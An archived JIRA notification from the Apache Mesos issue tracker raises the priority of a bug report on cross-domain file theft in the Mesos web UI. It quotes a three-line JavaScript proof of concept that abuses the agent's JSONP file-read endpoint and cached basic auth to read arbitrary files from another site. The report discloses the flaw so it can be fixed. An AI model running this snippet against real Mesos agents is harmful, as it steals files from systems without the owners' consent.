You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@mesos.apache.org by "Jacob Janco (JIRA)" <ji...@apache.org> on 2017/05/02 21:27:04 UTC
[jira] [Updated] (MESOS-7437) cross domain file-theft in the web-ui
[ https://issues.apache.org/jira/browse/MESOS-7437?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Jacob Janco updated MESOS-7437:
-------------------------------
Priority: Major (was: Minor)
> cross domain file-theft in the web-ui
> -------------------------------------
>
> Key: MESOS-7437
> URL: https://issues.apache.org/jira/browse/MESOS-7437
> Project: Mesos
> Issue Type: Bug
> Components: security, webui
> Reporter: Jacob Janco
> Assignee: Jacob Janco
>
> {code:javascript}
> x=document.createElement('script')
> x.src='http://$AGENT_URI/files/read?path=$PATH_TO_FILE&offset=0&length=50000&jsonp=console.log&_=1490306716903'
> document.body.appendChild(x)
> {code}
> The above code pasted into the web console on http://example.com/, for example, will yield the contents of the requested file. Basic auth is cached and resent in browser tabs/windows as long as the user has authenticated during the browser session.
--
This message was sent by Atlassian JIRA
(v6.3.15#6346)